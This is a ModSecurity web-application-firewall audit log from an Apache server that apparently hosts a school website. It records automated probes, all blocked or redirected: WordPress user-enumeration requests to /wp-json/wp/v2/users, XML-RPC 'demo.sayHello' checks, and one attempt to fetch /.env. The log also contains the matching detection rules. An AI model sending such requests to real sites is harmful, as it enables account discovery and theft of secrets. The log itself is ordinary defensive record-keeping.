Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f232930b-Z-- --28757977-A-- [10/May/2025:17:37:31 +0700] aB8sa8i6w7GTj2w44Z7msQAAAMg 103.236.140.4 36136 103.236.140.4 8181 --28757977-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.249 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.249 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --28757977-C-- demo.sayHello --28757977-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --28757977-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746873451100993 4904 (- - -) Stopwatch2: 1746873451100993 4904; combined=3869, p1=487, p2=3178, p3=23, p4=27, p5=90, sr=66, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28757977-Z-- --8d083e70-A-- [10/May/2025:17:37:41 +0700] aB8sdRLuBiaF9R054QCrlgAAABc 103.236.140.4 36144 103.236.140.4 8181 --8d083e70-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.125 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.125 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8d083e70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8d083e70-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746873461795145 2843 (- - -) Stopwatch2: 1746873461795145 2843; combined=1273, p1=447, p2=788, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8d083e70-Z-- --404ef52b-A-- [10/May/2025:17:37:43 +0700] aB8sdxLuBiaF9R054QCrlwAAABU 103.236.140.4 36146 103.236.140.4 8181 --404ef52b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.53 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --404ef52b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --404ef52b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746873463069618 2090 (- - -) Stopwatch2: 1746873463069618 2090; combined=982, p1=310, p2=639, p3=0, p4=0, p5=32, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --404ef52b-Z-- --60e88327-A-- [10/May/2025:17:37:50 +0700] aB8sfhLuBiaF9R054QCrmgAAAAI 103.236.140.4 36152 103.236.140.4 8181 --60e88327-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.125 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.125 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --60e88327-C-- demo.sayHello --60e88327-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --60e88327-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746873470912769 5008 (- - -) Stopwatch2: 1746873470912769 5008; combined=3772, p1=441, p2=3124, p3=22, p4=26, p5=92, sr=66, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60e88327-Z-- --74f7ce4c-A-- [10/May/2025:17:37:52 +0700] aB8sgBLuBiaF9R054QCrmwAAAAA 103.236.140.4 36154 103.236.140.4 8181 --74f7ce4c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.53 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --74f7ce4c-C-- demo.sayHello --74f7ce4c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --74f7ce4c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746873472012819 5884 (- - -) Stopwatch2: 1746873472012819 5884; combined=4258, p1=578, p2=3459, p3=30, p4=35, p5=93, sr=93, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74f7ce4c-Z-- --d080dd6c-A-- [10/May/2025:17:38:38 +0700] aB8srsi6w7GTj2w44Z7msgAAANQ 103.236.140.4 36166 103.236.140.4 8181 --d080dd6c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.195 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d080dd6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d080dd6c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746873518404191 2820 (- - -) Stopwatch2: 1746873518404191 2820; combined=1231, p1=424, p2=778, p3=0, p4=0, p5=29, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d080dd6c-Z-- --8dab3669-A-- [10/May/2025:17:38:44 +0700] aB8stBLuBiaF9R054QCroQAAAAY 103.236.140.4 36170 103.236.140.4 8181 --8dab3669-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.195 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8dab3669-C-- demo.sayHello --8dab3669-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8dab3669-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746873524673291 4659 (- - -) Stopwatch2: 1746873524673291 4659; combined=3651, p1=429, p2=3023, p3=23, p4=24, p5=89, sr=65, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8dab3669-Z-- --970d5205-A-- [10/May/2025:17:39:17 +0700] aB8s1RLuBiaF9R054QCrtgAAABI 103.236.140.4 36218 103.236.140.4 8181 --970d5205-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.3 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.3 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --970d5205-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --970d5205-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746873557494343 2267 (- - -) Stopwatch2: 1746873557494343 2267; combined=1189, p1=399, p2=762, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --970d5205-Z-- --70dfd43e-A-- [10/May/2025:17:39:20 +0700] aB8s2BLuBiaF9R054QCrugAAAAE 103.236.140.4 36226 103.236.140.4 8181 --70dfd43e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.176.3 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.176.3 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --70dfd43e-C-- demo.sayHello --70dfd43e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --70dfd43e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746873560776344 5153 (- - -) Stopwatch2: 1746873560776344 5153; combined=4022, p1=480, p2=3331, p3=28, p4=31, p5=90, sr=69, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70dfd43e-Z-- --1ca5b442-A-- [10/May/2025:17:39:30 +0700] aB8s4si6w7GTj2w44Z7mswAAAMk 103.236.140.4 36258 103.236.140.4 8181 --1ca5b442-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.108.93 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.108.93 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1ca5b442-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ca5b442-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746873570590451 2388 (- - -) Stopwatch2: 1746873570590451 2388; combined=1233, p1=398, p2=806, p3=0, p4=0, p5=29, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ca5b442-Z-- --19a6c17b-A-- [10/May/2025:17:39:41 +0700] aB8s7dr9PbfRBMhzxmSiqQAAAEI 103.236.140.4 36282 103.236.140.4 8181 --19a6c17b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.108.93 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.108.93 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --19a6c17b-C-- demo.sayHello --19a6c17b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --19a6c17b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746873581428311 5525 (- - -) Stopwatch2: 1746873581428311 5525; combined=4437, p1=546, p2=3688, p3=33, p4=37, p5=78, sr=72, sw=55, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19a6c17b-Z-- --a340f84e-A-- [10/May/2025:17:58:26 +0700] aB8xUsi6w7GTj2w44Z7nBwAAAMQ 103.236.140.4 37596 103.236.140.4 8181 --a340f84e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.62.21.190 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.62.21.190 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a340f84e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a340f84e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746874706820826 2765 (- - -) Stopwatch2: 1746874706820826 2765; combined=1251, p1=445, p2=775, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a340f84e-Z-- --d57a507d-A-- [10/May/2025:18:30:11 +0700] aB84wxLuBiaF9R054QCtewAAAAY 103.236.140.4 38114 103.236.140.4 8181 --d57a507d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.184.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.184.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d57a507d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d57a507d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746876611059689 2821 (- - -) Stopwatch2: 1746876611059689 2821; combined=1292, p1=428, p2=825, p3=0, p4=0, p5=39, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d57a507d-Z-- --eead165a-A-- [10/May/2025:18:30:16 +0700] aB84yBLuBiaF9R054QCtfQAAAAo 103.236.140.4 38118 103.236.140.4 8181 --eead165a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.184.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.184.2 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --eead165a-C-- demo.sayHello --eead165a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --eead165a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746876616479135 4680 (- - -) Stopwatch2: 1746876616479135 4680; combined=3666, p1=463, p2=3009, p3=22, p4=22, p5=88, sr=67, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eead165a-Z-- --6332d251-A-- [10/May/2025:18:39:02 +0700] aB861si6w7GTj2w44Z7nJAAAANU 103.236.140.4 38256 103.236.140.4 8181 --6332d251-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 61.247.178.217 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 61.247.178.217 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6332d251-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6332d251-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746877142203891 2351 (- - -) Stopwatch2: 1746877142203891 2351; combined=1012, p1=355, p2=631, p3=0, p4=0, p5=26, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6332d251-Z-- --2024044f-A-- [10/May/2025:18:47:10 +0700] aB88vquC4AqLGUOyzyU6UgAAAIA 103.236.140.4 38316 103.236.140.4 8181 --2024044f-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 165.22.235.3 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 165.22.235.3 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --2024044f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2024044f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746877630594646 722 (- - -) Stopwatch2: 1746877630594646 722; combined=287, p1=250, p2=0, p3=0, p4=0, p5=37, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2024044f-Z-- --400f2040-A-- [10/May/2025:19:31:06 +0700] aB9HCtr9PbfRBMhzxmSkGAAAAFE 103.236.140.4 39758 103.236.140.4 8181 --400f2040-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 77.68.24.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 77.68.24.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --400f2040-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --400f2040-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746880266257179 2777 (- - -) Stopwatch2: 1746880266257179 2777; combined=1233, p1=417, p2=786, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
